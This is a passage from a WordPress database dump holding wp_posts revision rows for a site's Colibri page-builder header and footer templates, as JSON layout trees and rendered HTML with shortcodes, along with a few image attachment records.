20:48:27','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2023-10-12 16:48:27','2023-10-12 20:48:27','',26,'https://gsudice.dataconn.net/?p=1685',0,'revision','',0),(1686,1,'2023-10-12 16:48:27','2023-10-12 20:48:27','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2023-10-12 16:48:27','2023-10-12 20:48:27','',25,'https://gsudice.dataconn.net/?p=1686',0,'revision','',0),(1687,1,'2023-10-12 16:48:27','2023-10-12 20:48:27','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2023-10-12 16:48:27','2023-10-12 20:48:27','',29,'https://gsudice.dataconn.net/?p=1687',0,'revision','',0),(1688,1,'2023-10-12 16:48:27','2023-10-12 20:48:27','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2023-10-12 16:48:27','2023-10-12 20:48:27','',28,'https://gsudice.dataconn.net/?p=1688',0,'revision','',0),(1690,1,'2023-10-12 16:50:49','2023-10-12 20:50:49','','IMG_9249','','inherit','open','closed','','img_9249','','','2023-10-12 16:50:49','2023-10-12 20:50:49','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/IMG_9249.jpg',0,'attachment','image/jpeg',0),(1696,1,'2023-10-13 08:53:49','2023-10-13 12:53:49','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-headshot-1.jpg','headshot-1.jpg','','inherit','open','closed','','headshot-1-jpg-3','','','2023-10-13 08:55:50','2023-10-13 12:55:50','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2.jpg',0,'attachment','image/jpeg',0),(1697,1,'2023-10-13 08:55:53','2023-10-13 